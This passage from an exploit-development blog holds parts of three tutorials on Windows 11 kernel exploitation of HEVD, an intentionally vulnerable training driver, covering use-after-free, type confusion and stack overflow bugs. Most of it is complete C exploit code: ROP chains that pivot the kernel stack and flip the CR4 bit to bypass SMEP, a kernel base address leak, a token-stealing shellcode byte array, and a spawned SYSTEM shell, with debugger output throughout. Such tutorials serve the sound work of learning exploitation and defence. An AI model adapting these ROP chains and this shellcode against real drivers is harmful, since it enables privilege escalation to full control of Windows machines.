    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        Error("VirtualLock");
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;    
    
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(STACK_PIVOT_GADGET);

    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    system("cmd.exe");
    return 0;
}

This gives us a shell as SYSTEM.

Resources

The post Windows Kernel Exploitation – HEVD x64 Use-After-Free appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Type Confusion

By: xct
10 July 2022 at 12:14

In the last post, we looked at a Stack Overflow in HEVD on Windows 11 x64, now are going to continue with a Type Confusion Vulnerability.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

We are going over the vulnerability briefly and will focus more on the exploitation part. The source shows the following 2 objects:

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    union {
        ULONG_PTR ObjectType;
        FunctionPointer Callback;
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

On the kernel object, we see a union of an object type and a callback, which means that there is only space for one of them, or in other words, using either of those members when accessing the struct will point to the same value. On the user object, on the other hand, we do not have this union and only have ObjectID and ObjectType.

The user object structure can be passed to the driver via an IOCTL and will then be used in the following way:

NTSTATUS TriggerTypeConfusion(_In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject) {
    ...
    KernelTypeConfusionObject = (PKERNEL_TYPE_CONFUSION_OBJECT)ExAllocatePoolWithTag(
            NonPagedPool,
            sizeof(KERNEL_TYPE_CONFUSION_OBJECT),
            (ULONG)POOL_TAG
    );
    KernelTypeConfusionObject->ObjectID = UserTypeConfusionObject->ObjectID;
    KernelTypeConfusionObject->ObjectType = UserTypeConfusionObject->ObjectType;
    ...
    Status = TypeConfusionObjectInitializer(KernelTypeConfusionObject);
    ...
}

The TypeConfusionObjectInitializer function is then going ahead and calling the callback function. This function has however the same value as the ObjectType which we provided in the user object. This means that this function will call whatever function pointer we place in the ObjectType field.

NTSTATUS TypeConfusionObjectInitializer(_In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject) {
    NTSTATUS Status = STATUS_SUCCESS;
    KernelTypeConfusionObject->Callback();
    return Status;
}

The IOCTL number for this call is 0x222023, which can be found in a similar way to the last post.

Exploitation

We start by writing a simple exploit template that defines the required structure, gets a handle to the driver, and calls the IOCTL with a dummy value:

#include <stdio.h>
#include <Windows.h>

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)0x4242424242424242;

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We set a breakpoint and then run this first version of our exploit:

0: kd> ba e1 HEVD!TypeConfusionObjectInitializer
0: kd> g
1: kd> 
HEVD!TypeConfusionObjectInitializer+0x37:
fffff804`8669754b ff5308          call    qword ptr [rbx+8]
1: kd> dq rbx+8
ffffbf8c`e5b7b248  42424242`42424242 a53058d9`e6cdbefe

We can see that the driver is trying to call our provided β€œB”s which of course fails. So now that we can trigger the vulnerability the question remains on what address we want to call and how that helps us in elevating privileges.

Since SMEP is active, we can not just allocate shellcode and have the driver call it, so we have to make the call to a ROP-gadget that allows us to pivot the kernel stack to a location we control. This would allow us to place more ROP-gadgets there to ultimately disable SMEP & jump to Shellcode. Let’s try to find such a pivot gadget via ropper:

ropper --file ntoskrnl.exe --console --clear-cache
(ntoskrnl.exe/PE/x86_64)> search mov esp, 0x
...
0x0000000140317f70: mov esp, 0x48000000; add esp, 0x28; ret;
...

Note that we do not want just any value, it should be one that is aligned otherwise we risk getting a BSOD. The one we found looks pretty good – the add esp instruction is not bothering us too much as we can just add some dummy values before putting our next gadgets. Now that we know the address our stack will be at after executing the gadget, we can allocate it and fill it with a few ROP-nops to make sure that our stack pivot is working as intended. Since ASLR is enabled, we also have to get the address the kernel is loaded at as discussed in the last post.

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD NOP_GADGET = ntBase + 0x200042; // ret;
    int index = 0;

    LPVOID kernelStack = VirtualAlloc((LPVOID)STACK_PIVOT_ADDR, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlFillMemory(kernelStack, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)kernelStack + 0x28);
    
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", STACK_PIVOT_ADDR);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We run the updated exploit with a breakpoint on the stack pivot:

0: kd> ba e1 fffff80581f17f70
0: kd> g
Breakpoint 0 hit
nt!ExfReleasePushLock+0x20:
fffff805`81f17f70 bc00000048      mov     esp,48000000h
...

UNEXPECTED_KERNEL_MODE_TRAP (7f)
...
kb will then show the corrected stack.
Arguments:
Arg1: 0000000000000008, EXCEPTION_DOUBLE_FAULT
Arg2: ffff910032865e70
Arg3: 0000000048000000

On executing the pivot gadget we get a crash. This issue can be tricky to debug – essentially 2 things are happening. First, we need a bit of space before and after our gadgets so the kernel can read/write there, and additionally, we have to make sure that the stack is actually paged in because page faults will not be handled at this point (we are still in kernel mode). We update our PoC by adding 0x1000 bytes in front of our buffer and then use VirtualLock to force the memory to be paged in:

QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!VirtualLock(kernelStack, 0x14000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}

Now we no longer get a crash and can run our ROP-nops!

0: kd> ba e1 fffff8046bd17f70
0: kd> g
nt!ExfReleasePushLock+0x20:
fffff804`6bd17f70 bc00000048      mov     esp,48000000h
1: kd> dq 48000000 -100
00000000`47ffff00  00000000`00000000 00000000`00000000
...
1: kd> dq 48000000
00000000`48000000  41414141`41414141 41414141`41414141
...
1: kd> t
nt!ExfReleasePushLock+0x25:
fffff804`6bd17f75 83c428          add     esp,28h
1: kd> p
nt!ExfReleasePushLock+0x28:
fffff804`6bd17f78 c3              ret
1: kd> p
nt!CmpUnlockKcbStackFlusherLocksExclusive+0x3a:
fffff804`6bc00042 c3              ret

At this point, the hardest part is over. We can now execute ROP-gadgets which means we can repeat the exact same steps we used in our stack overflow exploit. First, we flip the 20th bit in CR4 to disable SMEP and then jump to our shellcode (which is the same as before). The full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", kernelStack);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    printf("[>] Enjoy your shell!\n", ntBase);
    system("cmd");
    return 0;
}

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Type Confusion appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Stack Overflow

By: xct
2 July 2022 at 12:01

After setting up our debugging environment, we will look at HEVD for a few posts before diving into real-world scenarios. HEVD is an awesome, intentionally vulnerable driver by HackSysTeam that allows exploiting a lot of different kernel vulnerability types. I think this one is great to get started because you can play with exploitation without reversing any big applications or drivers.

The arguably easiest exploit on HEVD is a classic stack overflow where you overwrite the return address and have a good amount of space before & after the overwrite. We are using HEVD on default OS settings, which means ASLR, DEP & SMEP are enabled. The vulnerable function does not use stack cookies.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

I’m not going to pretend that I don’t know where the vulnerability is and will focus primarily on the exploitation part. The vulnerable function is TriggerBufferOverflowStack and uses a RtlCopyMemory from the user-provided buffer to a fixed-sized kernel buffer of a size 512 that is on the kernel stack.

In assembly this ends up as memmove:

To see what’s actually happening, we are going to create our β€œexploit” and just call this function while having a breakpoint on it. We are going to create a new C++ console project with the following code:

#include <stdio.h>
#include <Windows.h>


int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	LPVOID uBuffer = VirtualAlloc(NULL, 512, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 512, 'A');
	DeviceIoControl(hDriver, 0x222003, (LPVOID)&uBuffer, sizeof(uBuffer), NULL, 0, NULL, NULL);

}

There are a few noteworthy things here. First of all, we are using CreateFile to get a handle to the driver, using its name \\.\HacksysExtremeVulnerableDriver . You can find this name by looking at the DriverEntry function in IDA:

Then we allocate our user buffer with a size of 512 which is the same size the kernel expects. Then we call the function via an IOCTL. This is essentially a way to tell the kernel to call a specific function in our driver, identified by the number, here 0x222003. Finding the number can be a bit tricky – in this case, we can go to TriggerBufferOverflowStack in IDA and then press x to find references. This shows a reference to BufferOverflowStackIoctlHandler for which we look for references again. Finally, we end up in IrpDeviceIoCtlHandler which is a big switch/case statement calling different functions depending on the IOCTL number you provide.

If we follow the arrow pointing to this basic block backward (can be a few times, but here it’s only once) we eventually end up at the correct number.

To compile our exploit we set it to Release & x64. We know how to call the function now & are going to set a breakpoint in WinDbg. In order for WinDbg to automatically load the correct symbols for HEVD you should place HEVD.pdb at C:\projects\hevd\build\driver\vulnerable\x64\HEVD\HEVD.pdb .

0: kd> ba e1 HEVD!TriggerBufferOverflowStack
0: kd> g
... <run exploit> ...
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack:
fffff805`7d3e65b4 48895c2408      mov     qword ptr [rsp+8],rbx
u rip L40
...
fffff805`7d3e666d ff1595b9f7ff    call    qword ptr [HEVD!_imp_DbgPrintEx (fffff805`7d362008)]
fffff805`7d3e6673 4c8bc6          mov     r8,rsi
fffff805`7d3e6676 488bd7          mov     rdx,rdi
fffff805`7d3e6679 488d4c2420      lea     rcx,[rsp+20h]
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
...

We can see that the memmove we saw in IDA is actually a memcpy. Let’s break there.

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> r
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc88ab6420f60
rdx=0000022b3e180000 rsi=0000000000000200 rdi=0000022b3e180000
rip=fffff8057d3e667e rsp=ffffc88ab6420f40 rbp=ffffdb899c235c40
 r8=0000000000000200  r9=000000000000004d r10=0000000000000000
...

On x64, arguments to functions are passed in RCX, RDX, R8 & R9. Any additional arguments will be placed on the stack. We can see that RCX is a kernel address and therefore likely the target kernel buffer. RDX is a user-mode address and contains our input buffer. R8 contains the length, here 512.

1: kd> dq rcx L4
ffffc88a`b6420f60  00000000`00000000 00000000`00000000
ffffc88a`b6420f70  00000000`00000000 00000000`00000000
1: kd> dq rdx L4
0000022b`3e180000  41414141`41414141 41414141`41414141
0000022b`3e180010  41414141`41414141 41414141`41414141

Let’s step over the call and observe that the kernel buffer is filled with our input.

1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> dq rcx L4
ffffc88a`b6420f60  41414141`41414141 41414141`41414141
ffffc88a`b6420f70  41414141`41414141 41414141`41414141

Now let’s see what happens when we extend the length of our input buffer:

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, 'A');
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...

If we break again but this time run until the function returns, we can see that the return address has been overwritten:

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> pt
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret
1: kd> dq rsp
ffffc88a`b4a21778  41414141`41414141 41414141`41414141
ffffc88a`b4a21788  41414141`41414141 41414141`41414141
1: kd> g
Access violation - code c0000005 (!!! second chance !!!)
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret

We can see that the return address was overwritten with our input β€œA”s. At this point, we confirmed the vulnerability & can trigger a crash.

Exploitation

Now that we can crash it with a large input buffer, the next step is figuring out the exact offset at which we overwrite RIP. We can generate a pattern with msf, send it, and then inspect RSP on the ret:

msf-pattern_create -l 2500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8...
...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
const char* pattern = { "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8..."};
RtlCopyMemory(uBuffer, pattern, 2500);
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...
HEVD!TriggerBufferOverflowStack+0x10b:
fffff800`6ebf66bf c3              ret
1: kd> dq rsp
ffffba89`e9fe9778  43327243`31724330 35724334`72433372
ffffba89`e9fe9788  72433772`43367243 43307343`39724338
msf-pattern_offset -q 43327243 -l 2500
[*] Exact match at offset 2076

After sending the pattern and letting it run, we can see that we got our access violation again and inspecting RSP allowed us to find the offset: 2076. At this point, we could allocate shellcode and try to jump to it. Note that the offset is slightly off – if you debug it you will see that only the 2nd half of the shellcode address ends up at the correct position – in the following snippet, I account for that (real offset being 2076-4).

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, '\x41');
RtlFillMemory(shellcode, 500, '\x90');
*(QWORD*)((QWORD)uBuffer + 2072) = (QWORD)shellcode;
...
0: kd> ba e1 HEVD!TriggerBufferOverflowStack+0x10b
0: kd> g
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack+0x10b:
fffff802`a74966bf c3              ret
1: kd> dq rsp
fffffa8a`25b72778  00000173`3c510000 41414141`41414141
fffffa8a`25b72788  41414141`41414141 41414141`41414141
1: kd> p
00000173`3c510000 90              nop
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc

After trying to execute one of the NOPs we get an error. We can get some additional information with the analyze extension:

!analyze -v
...
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)

This is SMEP (Supervisor Mode Execution Prevention) kicking in. The kernel is not allowed to execute code at the user-mode address we provided and can therefore not just execute our shellcode. In order to bypass SMEP, we have to find a way to either disable it or make it β€œthink” we are not a user-mode page. For this introductory exploit, I’ll just show the bypass method.

SMEP is controlled by the 20th bit in the CR4 Register.

If we can somehow change that bit, we can disable it & still jump to our shellcode and execute it. While we can not execute shellcode, we can use ROP to flip that bit. To do that, we need to first look for gadgets we can use inside the driver or kernel. The kernel is a much better source of gadgets due to its size. I’m a big fan of ropper so I’m going to copy ntoskrnl.exe from the Debuggee VM to my Kali VM.

ropper --file ntoskrnl.exe --console
(ntoskrnl.exe/PE/x86_64)> search %cr4%
0x00000001403acd47: mov cr4, rcx; ret;
(ntoskrnl.exe/PE/x86_64)> search pop rcx
0x000000014020a386: pop rcx; ret;

We identified 2 gadgets we can use, POP RCX to get a value with its 20th bit set to zero into RCX and MOV CR4, RCX to get that value into CR4. It’s usually a good idea to get the β€œold” value of CR4 and then modify it. For simplicity, we are just going to observe what it looks like in the debugger when we execute our exploit and then hardcode it here.

Before adding the ROP chain to our exploit we have to think about ASLR. Ropper shows relative addresses so we need to find the load address of the kernel. Fortunately, this is very easy from a medium integrity shell as there is an API that allows to obtain it:

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

With the base address, we can now add the gadget offsets to obtain a proper ROP chain. We update our exploit with this chain & a dummy value for CR4:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x3acd47;
	QWORD MOV_CR4_RCX = ntBase + 0x20a386;
	int index = 0;

	LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 2500, '\x41');
	RtlFillMemory(shellcode, 500, '\x90');

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x0;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);

}

We run it with a breakpoint on the overwritten return address:

HEVD!TriggerBufferOverflowStack+0x10b:
fffff804`5e6f66bf c3              ret
0: kd> dq rsp
fffff088`b0910778  fffff804`3640a386 00000000`00000000
fffff088`b0910788  fffff804`365acd47 0000016d`86580000
fffff088`b0910798  41414141`41414141 41414141`41414141
fffff088`b09107a8  41414141`41414141 41414141`41414141
fffff088`b09107b8  41414141`41414141 41414141`41414141
fffff088`b09107c8  41414141`41414141 41414141`41414141
fffff088`b09107d8  41414141`41414141 41414141`41414141
fffff088`b09107e8  41414141`41414141 41414141`41414141
0: kd> p
nt!HalSendNMI+0x276:
fffff804`3640a386 59              pop     rcx
1: kd> p
nt!HalSendNMI+0x277:
fffff804`3640a387 c3              ret
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx
1: kd> 
Unknown exception - code c0000096 (!!! second chance !!!)
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx

We get an exception – it does not allow us to write cr4 with zero. Let’s inspect its current value:

1: kd> r cr4
cr4=0000000000350ef8

We can hardcode the value and flip the 20th bit, then try again:

*(rop + index++) = 0x350ef8 ^ 1UL << 20;
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`737acd47 0f22e1          mov     cr4,rcx
1: kd> r rcx
rcx=0000000000250ef8
1: kd> p
nt!KeFlushCurrentTbImmediately+0x1a:
fffff800`737acd4a c3              ret
1: kd> p
0000026a`93680000 90              nop
1: kd> 
0000026a`93680001 90              nop
1: kd> 
0000026a`93680002 90              nop

We can see that by setting a value that makes more sense we can disable SMEP & execute our NOPs! Now we need kernel shellcode that will somehow let us elevate privileges without causing a BSOD.

Kernel Shellcode

For this exploit, we are going to go with a simple token stealing payload. Every process has a token associated that defines its privileges. A pointer to this token is saved in the EPROCESS structure:

